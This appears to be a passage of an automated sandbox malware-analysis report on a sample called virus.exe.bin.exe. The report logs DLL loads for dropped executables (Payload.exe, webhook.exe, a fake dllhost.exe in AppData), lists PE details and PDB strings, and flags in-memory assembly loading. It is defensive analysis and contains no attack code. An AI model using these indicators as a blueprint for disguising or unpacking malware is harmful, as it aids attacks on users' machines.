Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d9.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dwmapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dxcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dwrite.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dataexchange.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: d3d11.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dcomp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dxgi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: twinapi.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: textinputframework.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Section loaded: shfolder.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: virus.exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: virus.exe.bin.exe

Static file information: File size 6809900 > 1048576

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll

Jump to behavior

Source: virus.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: virus.exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 Corporation1)0' source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Daniel\source\repos\joinerStub\obj\Release\joinerStub.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Daniel\program.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: virus.exe.bin.exe, Module1.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: Hyra.exe.0.dr, Module1.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
